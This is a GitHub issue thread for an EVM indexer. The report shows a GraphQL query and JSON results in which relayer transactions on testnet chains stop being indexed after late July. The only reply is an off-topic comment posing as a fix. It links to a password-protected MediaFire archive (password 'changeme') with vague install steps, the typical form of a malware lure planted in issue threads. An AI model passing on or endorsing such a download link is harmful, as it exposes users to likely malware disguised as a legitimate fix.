### ISSUE TITLE
Indexer not reporting relayer transactions

### ISSUE THREAD

**Issue by dshiell** [polymerdao/evm-indexer#28]
When querying the indexer for transactions on a virtual chain (not eth-sepolia==11155111) with no value transfer it is expected to see many recent relayer txns, however the most recent returned record is showing a block timestamp of 7/29 (1722269380). Health checks and loadtest have been going since then so relayer txns have been occurring.

RELAYER_ADDRESS_BASE --> 0xc760fbfa7e80564052a2e50976450884f5cc41af
RELAYER_ADDRESS_OPTIMISM --> 0xc760fbfa7e80564052a2e50976450884f5cc41af

```
query MyQuery {
  transactions(limit: 100, where: {value_eq: "0", chainId_not_eq: 11155111}, orderBy: blockTimestamp_DESC) {
    gasPrice
    gasUsed
    chainId
    blockTimestamp
  }
}
```

```
{
  "data": {
    "transactions": [
      {
        "gasPrice": "1593106",
        "gasUsed": "30207",
        "chainId": 11155420,
        "blockTimestamp": "1722269380000"
      },
      {
        "gasPrice": "5246581123",
        "gasUsed": "30207",
        "chainId": 11155420,
        "blockTimestamp": "1722178586000"
      },
      {
        "gasPrice": "1000499",
        "gasUsed": "685936",
        "chainId": 84532,
        "blockTimestamp": "1720092820000"
      },
      {
        "gasPrice": "1000525",
        "gasUsed": "687437",
        "chainId": 84532,
        "blockTimestamp": "1720092566000"
      },
      {
        "gasPrice": "33905177",
        "gasUsed": "685936",
        "chainId": 11155420,
        "blockTimestamp": "1720092558000"
      },
      {
...
```

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
